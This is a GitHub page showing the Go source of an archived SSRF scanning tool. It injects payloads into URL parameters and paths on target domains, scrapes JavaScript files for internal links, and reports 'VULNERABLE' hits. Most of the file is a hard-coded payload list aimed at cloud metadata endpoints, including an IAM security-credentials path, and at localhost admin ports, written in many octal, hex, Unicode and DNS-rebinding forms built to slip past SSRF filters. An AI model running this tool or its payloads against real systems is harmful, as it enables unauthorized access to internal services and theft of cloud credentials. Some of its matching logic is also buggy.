This repository has been archived by the owner on Jul 28, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathssrftool.go
624 lines (541 loc) · 19.4 KB
/
ssrftool.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
package main
import (
"regexp"
"fmt"
"time"
"sync"
"bufio"
"os"
"strings"
"io/ioutil"
"net/http"
"net/url"
"flag"
"github.com/briandowns/spinner"
"github.com/projectdiscovery/gologger"
. "github.com/logrusorgru/aurora"
)
const banner = `
█▀ █▀ █▀█ █▀▀
▄█ ▄█ █▀▄ █▀░
v1.2 - @z0idsec (fixed by @R0X4R)
`
func main () {
gologger.Printf("%s\n", banner)
gologger.Labelf("Use with caution. You are responsible for your actions\n")
gologger.Labelf("Developers assume no liability and are not responsible for any misuse or damage.\n\n")
var concurrency int
var payloads string
var match string
var matchList string
var appendMode bool
var paths bool
var silent bool
var wordlist bool
var brute bool
var domains string
var paramsList string
flag.IntVar(&concurrency, "concurrency", 30, "Set the concurrency for greater speeds")
flag.StringVar(&domains, "domains", "", "The list of subdomains")
flag.StringVar(¶msList, "parameters", "", "The parameters list")
flag.StringVar(&payloads, "payloads", "", "The payloads list")
flag.StringVar(&match, "pattern", "", "Match the response with a pattern (e.g.) 'Success:'")
flag.StringVar(&matchList, "patterns", "", "Match the response with a list of patterns")
flag.BoolVar(&appendMode, "append", false, "Append the payload to the parameter")
flag.BoolVar(&paths, "paths", false, "(true or false) for testing paths or parameters")
flag.BoolVar(&wordlist, "gen", false, "Generate a SSRF wordlist to be used")
flag.BoolVar(&brute, "brute", false, "Brute force parameters against endpoints to find SSRF")
flag.BoolVar(&silent, "silent", false, "silent output")
flag.Parse()
if wordlist == true {
// Generate the wordlist for ssrf testing
generate_wordlist()
}else {
// Check to see if these flags are used
if (payloads != "" && domains != "") || (match != "" || matchList != "") {
s := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s.Suffix =" Please be patient"
s.Start()
s.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
s.Stop()
// Continue Create the goroutine
var wg sync.WaitGroup
for i:=0; i<=concurrency; i++ {
wg.Add(1)
go func () {
// Test For SSRF
test_ssrf(domains, paramsList, payloads, match, matchList, appendMode, silent, paths, brute)
wg.Done()
}()
wg.Wait()
}
}
}
}
// Save the wordlist
func save_to_file(data []string, suffix string, filename string) {
s := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s.Suffix = suffix
s.Start()
s.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
f,err:=os.Create(filename)
if err != nil {
fmt.Println(Bold(Red(err)))
return
}
for _,v := range data {
_,err := f.WriteString(v + "\n")
if err != nil {
fmt.Println(Bold(Red(err)))
f.Close()
return
}
}
f.Close()
s.Stop()
}
// Search through all javascript for domains
func search_for_links() []string {
var links=make([]string, 0)
var jsFiles=make([]string, 0)
client:= &http.Client{}
scanner:=bufio.NewScanner(os.Stdin)
for scanner.Scan() {
jsLink:=scanner.Text()
jsFiles=append(jsFiles, jsLink)
req,err:=http.NewRequest("GET", jsLink,nil)
if err != nil {
return nil
}
resp,err:=client.Do(req)
if err != nil {
return nil
}
bodyBuffer,err:=ioutil.ReadAll(resp.Body)
if err != nil {
return nil
}
// The body to grep for
bodyString:=string(bodyBuffer)
// Search for all links
re:=regexp.MustCompile(`(https?|ftp|file)://[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]`)
matches:=re.FindStringSubmatch(bodyString)
if matches != nil {
// Check for internal domains in js
if strings.Contains("internal", matches[0]) {
links=append(links, matches[0])
}
if strings.Contains("prod", matches[0]) {
links=append(links, matches[0])
}
if strings.Contains("jira", matches[0]) {
links=append(links, matches[0])
}
if strings.Contains("corp", matches[0]) {
links=append(links, matches[0])
}
if strings.Contains("uat", matches[0]) {
links=append(links, matches[0])
}
}
}
// Append some other payloads
links=append(links, "http://example.com")
links=append(links, "http://127.0.0.1:80")
links=append(links, "http://127.0.0.1:443")
links=append(links, "http://127.0.0.1:22")
links=append(links, "https://localhost/admin")
links=append(links, "http://[::]:22/")
links=append(links, "http://169.254.169.254")
links=append(links, "http://169.254.169.254/computeMetadata/v1/")
links=append(links, "169.254.169.254/latest/meta-data/iam/security-credentials/flaws/")
links=append(links, "example.com")
links=append(links, "127.0.0.1:80")
links=append(links, "169.254.169.254/computeMetadata/v1/")
links=append(links, "127.0.0.1:443")
links=append(links, "127.0.0.1:22")
links=append(links, "localhost/admin")
links=append(links, "169.254.169.254")
links=append(links, "[::]:22/")
links=append(links, "http://169.254.169.254\\http://0.google.com")
links=append(links, "https://[0:0:0:0:0:0:0:0]")
links=append(links, "https://0.0.0.0")
links=append(links, "https://[::]")
links=append(links, "https://0177.1")
links=append(links, "https://0x7f.1")
links=append(links, "http://0x7f000001")
links=append(links, "http://2130706433")
links=append(links, "http://127.000.001")
links=append(links, "https://[0:0:0:0:0:ffff:0.0.0.0]")
links=append(links, "https://[::ffff:0.0.0.0]")
links=append(links, "https://017700000001")
links=append(links, "https://[0:0:0:0:0:ffff:127.0.0.1]")
links=append(links, "https://[::ffff:127.0.0.1]/")
links=append(links, "https://[::ffff:7f00:2]")
links=append(links, "https://[::ffff:127.0.0.1]")
links=append(links, "https://[::ffff:7f00:1]")
links=append(links, "https://[0:0:0:0:0:ffff:127.0.0.2]")
links=append(links, "http://⑯⑨。②⑤④。⑯⑨。②⑤④/")
links=append(links, "http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/")
links=append(links, "http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/")
links=append(links, "http://②⑧⑤②⓪③⑨①⑥⑥:80/")
links=append(links, "http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/")
links=append(links, "http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥")
links=append(links, "http://[::ffff:169.254.169.254]")
links=append(links, "http://[0:0:0:0:0:ffff:169.254.169.254]")
links=append(links, "https://[::ffff:127.0.0.2]")
links=append(links, "http://[::ffff:a9fe:a9fe]")
links=append(links, "https://0x7f.0.0.1")
links=append(links, "http://169-254-169-254.nip.io/")
links=append(links, "https://0x7f.0.0.1")
links=append(links, "https://[::ffff:0:0]")
links=append(links, "0251.0376.0251.0376")
links=append(links, "0251.0376.0251.0xFE")
links=append(links, "0251.0376.0251.254")
links=append(links, "0251.0376.0xA9.0376")
links=append(links, "0251.0376.0xA9.0xFE")
links=append(links, "0251.0376.0xA9.254")
links=append(links, "0251.0376.169.0376")
links=append(links, "0251.0376.169.0xFE")
links=append(links, "0251.0376.169.254")
links=append(links, "0251.0376.43518")
links=append(links, "0251.0xFE.0251.0376")
links=append(links, "0251.0xFE.0251.0xFE")
links=append(links, "0251.0xFE.0251.254")
links=append(links, "0251.0xFE.0xA9.0376")
links=append(links, "0251.0xFE.0xA9.0xFE")
links=append(links, "0251.0xFE.0xA9.254")
links=append(links, "0251.0xFE.169.0376")
links=append(links, "0251.0xFE.169.0xFE")
links=append(links, "0251.0xFE.169.254")
links=append(links, "0251.0xFE.43518")
links=append(links, "0xA9.0376.0251.0376")
links=append(links, "0xA9.0376.0251.0xFE")
links=append(links, "0xA9.0376.0251.254")
links=append(links, "0xA9.0376.0xA9.0376")
links=append(links, "0xA9.0376.0xA9.0xFE")
links=append(links, "0xA9.0376.0xA9.254")
links=append(links, "0xA9.0376.169.0376")
links=append(links, "0xA9.0376.169.0xFE")
links=append(links, "0xA9.0376.169.254")
links=append(links, "0xA9.0376.43518")
links=append(links, "0xA9.0xFE.0251.0376")
links=append(links, "0xA9.0xFE.0251.0xFE")
links=append(links, "0xA9.0xFE.0251.254")
links=append(links, "0xA9.0xFE.0xA9.0376")
links=append(links, "0xA9.0xFE.0xA9.0xFE")
links=append(links, "0xA9.0xFE.0xA9.254")
links=append(links, "0xA9.0xFE.169.0376")
links=append(links, "0xA9.0xFE.169.0xFE")
links=append(links, "0xA9.0xFE.169.254")
links=append(links, "0xA9.0xFE.43518")
links=append(links, "0xA9.254.0251.0376")
links=append(links, "0xA9.254.0251.0xFE")
links=append(links, "0xA9.254.0251.254")
links=append(links, "0xA9.254.0xA9.0376")
links=append(links, "0xA9.254.0xA9.0xFE")
links=append(links, "0xA9.254.0xA9.254")
links=append(links, "0xA9.254.169.0376")
links=append(links, "0xA9.254.169.0xFE")
links=append(links, "0xA9.254.169.254")
links=append(links, "0xA9.254.43518")
links=append(links, "169.0376.0251.0376")
links=append(links, "169.0376.0251.0xFE")
links=append(links, "169.0376.0251.254")
links=append(links, "169.0376.0xA9.0376")
links=append(links, "169.0376.0xA9.0xFE")
links=append(links, "169.0376.0xA9.254")
links=append(links, "169.0376.169.0376")
links=append(links, "169.0376.169.0xFE")
links=append(links, "169.0376.169.254")
links=append(links, "169.0376.43518")
links=append(links, "169.0xFE.0251.0376")
links=append(links, "169.0xFE.0251.0xFE")
links=append(links, "169.0xFE.0251.254")
links=append(links, "169.0xFE.0xA9.0376")
links=append(links, "169.0xFE.0xA9.0xFE")
links=append(links, "169.0xFE.0xA9.254")
links=append(links, "169.0xFE.169.0376")
links=append(links, "169.0xFE.169.0xFE")
links=append(links, "169.0xFE.169.254")
links=append(links, "169.0xFE.43518")
links=append(links, "169.254.0251.0376")
links=append(links, "169.254.0251.0376")
links=append(links, "169.254.0251.0xFE")
links=append(links, "169.254.0251.0xFE")
links=append(links, "169.254.0251.254")
links=append(links, "169.254.0251.254")
links=append(links, "169.254.0xA9.0376")
links=append(links, "169.254.0xA9.0376")
links=append(links, "169.254.0xA9.0xFE")
links=append(links, "169.254.0xA9.0xFE")
links=append(links, "169.254.0xA9.254")
links=append(links, "169.254.0xA9.254")
links=append(links, "169.254.169.0376")
links=append(links, "169.254.169.0376")
links=append(links, "169.254.169.0xFE")
links=append(links, "169.254.169.0xFE")
links=append(links, "169.254.169.254")
links=append(links, "169.254.43518")
links=append(links, "2852039166")
links=append(links, "7147006462")
links=append(links, "0xA9FEA9FE")
links=append(links, "0xA9FEA9FE")
links=append(links, "http://[::ffff:169.254.169.254]")
links=append(links, "http://[0:0:0:0:0:ffff:169.254.169.254]")
links=append(links, "https://[::ffff:127.0.0.2]")
links=append(links, "http://[::ffff:a9fe:a9fe]")
links=append(links, "https://0x7f.0.0.1")
links=append(links, "https://[::ffff:0:0]")
links=append(links, "http://0xd8.0x3a.0xd6.0xe3")
links=append(links, "http://0xd83ad6e3")
links=append(links, "http://0xd8.0x3ad6e3")
links=append(links, "http://0xd8.0x3a.0xd6e3")
links=append(links, "http://0330.072.0326.0343")
links=append(links, "http://000330.0000072.0000326.00000343")
links=append(links, "http://033016553343")
links=append(links, "http://3627734755")
links=append(links, "http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37")
links=append(links, "http://216.0x3a.00000000326.0xe3")
links=append(links, "http://[email protected]")
links=append(links, "http://[0:0:0:0:0:ffff:127.0.0.1]")
// Save the JS files.
save_to_file(jsFiles, " Saving JS Files for later use", "JSfiles.txt")
return links
}
// Search endpoints & parameters, test for ssrf
func fetch_endpoints_params(payload string, currUrl string, paramsFile string, silent bool, matches string, match string) {
var endpoints = make([]string, 0)
client:=&http.Client{}
s := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s.Suffix = " Searching endpoints & parameters"
s.Start()
s.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
s.Stop()
jsFile,err := os.Open("jsfiles.txt")
if err != nil {
fmt.Println(Bold(Red("[!] Could not read file (maybe permission issue)")))
return
}
jsScanner := bufio.NewScanner(jsFile)
for jsScanner.Scan() {
jsLink:=jsScanner.Text()
req,err:=http.NewRequest("GET", jsLink, nil)
if err != nil {
return
}
resp,err:= client.Do(req)
if err != nil {
return
}
bodyBytes,err:=ioutil.ReadAll(resp.Body)
if err != nil {
return
}
bodyString:=string(bodyBytes)
// Search for all links
re:=regexp.MustCompile(`(https?|ftp|file)://[-A-Za-z0-9\+&@#/%?=~_|!:,.;]*[-A-Za-z0-9\+&@#/%=~_|]`)
matches:=re.FindStringSubmatch(bodyString)
if matches != nil {
u,_ := url.Parse(matches[0])
endpoints=append(endpoints, u.Path)
}
}
save_to_file(endpoints, " Saving Endpoints to endpoints.txt", "endpoints.txt")
// Brute Force for SSRF
brute_force_for_ssrf(payload, currUrl, "endpoints.txt", paramsFile, matches, match, silent)
}
// Generate the wordlist from javascript
func generate_wordlist() {
s := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s.Suffix =" Generating SSRF wordlist"
s.Start()
s.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
s.Stop()
payloads:=search_for_links()
fmt.Println(Sprintf(Cyan("SSRF Wordlist is %d lines"), Red(len(payloads))))
save_to_file(payloads, " Saving wordlist as ssrf.txt", "ssrf.txt")
}
// Brute forces for SSRF vulnerabilities
func brute_force_for_ssrf(payload string, url string, endpoints string, parameters string, matches string, match string, silent bool) {
endpointsF,err:=os.Open(endpoints)
if err != nil { return }
parametersF,err:= os.Open(parameters)
if err != nil { return }
es := bufio.NewScanner(endpointsF)
ps := bufio.NewScanner(parametersF)
for es.Scan (){
for ps.Scan() {
newLink:=url+es.Text()+"/?"+ps.Text()+"="+payload
if silent == false {
fmt.Println(Bold(Red(">")), Bold(White(" Testing ")), Bold(White(newLink)))
}
client:=&http.Client{}
req,err:=http.NewRequest("GET", url, nil)
if err != nil {
return
}
resp,err:=client.Do(req)
if err != nil {
return
}
bodyBytes,err := ioutil.ReadAll(resp.Body)
if err != nil {
return
}
bodyString := string(bodyBytes)
if match != "" {
if strings.Contains(bodyString, match) {
fmt.Println(Bold(Cyan(bodyString)))
fmt.Println(Bold(Red("VULNERABLE: " + url)))
}
}
if matches != "" {
file,err:=os.Open(matches)
if err != nil { return }
scanner:=bufio.NewScanner(file)
for scanner.Scan() {
if strings.Contains(bodyString, scanner.Text()) {
fmt.Println(Bold(Cyan(bodyString)))
fmt.Println(Bold(Red("VULNERABLE: " + url)))
}
}
}
}
}
}
// This is used to test for ssrf
func test_ssrf(domains string, paramsFile string, payloads string, match string, matchList string, appendMode bool, silent bool, paths bool, brute bool) {
payloadList :=make([]string, 0)
links := make([]string, 0)
file,err:=os.Open(payloads)
if err != nil {
return
}
time.Sleep(time.Millisecond * 10)
domainsF,err:=os.Open(domains)
if err != nil { return }
scanner:=bufio.NewScanner(domainsF)
pScanner:=bufio.NewScanner(file)
s := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s.Suffix =" Generating links to test"
s.Start()
s.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
for {
scanner.Scan()
text:=scanner.Text()
if len(text) != 0 {
links = append(links,text)
}else {
break
}
}
s.Stop()
s1 := spinner.New(spinner.CharSets[9], 100*time.Millisecond) // Build our new spinner
s1.Suffix =" Generating Payloads from list"
s1.Start()
s1.Color("red") // Set the spinner color to red
time.Sleep(time.Second * 2)
for {
pScanner.Scan()
text:=pScanner.Text()
if len(text) != 0 {
payloadList = append(payloadList,text)
}else {
break
}
}
s1.Stop()
for _,l:=range links {
for _,p:= range payloadList {
link:=l
payload:=p
u,err := url.Parse(link)
if err != nil {
fmt.Println(Bold(Red(">")), err)
}
if brute == true {
if paramsFile == "" {
fmt.Println(Bold(Red("> Make sure to specify the parameters wordlist")))
os.Exit(1)
}
generate_wordlist()
// BruteForce For SSRF
fetch_endpoints_params(payload, link, paramsFile, silent, matchList, match)
}
if paths == false {
qs:=url.Values{}
for param, vv := range u.Query() {
if appendMode == true {
qs.Set(param, vv[0]+payload)
u.RawQuery = qs.Encode()
if silent == false {
fmt.Println(Bold(Red(">")), Bold(White(" Testing ")), Bold(White(u)))
}
make_request(u.String(), match, matchList)
}else {
qs.Set(param, payload)
u.RawQuery = qs.Encode()
if silent == false {
fmt.Println(Bold(Red(">")), Bold(White(" Testing ")), Bold(White(u)))
}
make_request(u.String(), match, matchList)
}
}
}else {
newLink:=link+"/"+payload
if silent == false {
fmt.Println(Bold(Red(">")), Bold(White(" Testing ")), Bold(White(newLink)))
}
make_request(newLink, match, matchList)
}
}
}
os.Exit(1)
}
// Making a request checking the output for vulnerabilities
func make_request(url string, match string, matchList string) {
client:=&http.Client{}
req,err:=http.NewRequest("GET", url, nil)
if err != nil {
return
}
resp,err:=client.Do(req)
if err != nil {
return
}
if match != "" {
bodyBytes,err := ioutil.ReadAll(resp.Body)
if err != nil {
return
}
bodyString := string(bodyBytes)
if strings.Contains(bodyString, match) {
fmt.Println(Bold(Cyan(bodyString)))
fmt.Println(Bold(Red("VULNERABLE: " + url)))
}
}else {
bodyBytes,err := ioutil.ReadAll(resp.Body)
if err != nil {
return
}
bodyString := string(bodyBytes)
mF,err := os.Open(matchList)
if err != nil {
return
}
defer mF.Close()
mScanner:=bufio.NewScanner(mF)
for mScanner.Scan() {
if strings.Contains(bodyString, mScanner.Text()) {
fmt.Println(Bold(Cyan(bodyString)))
fmt.Println(Bold(Red("VULNERABLE: " + url)))
}
}
}
}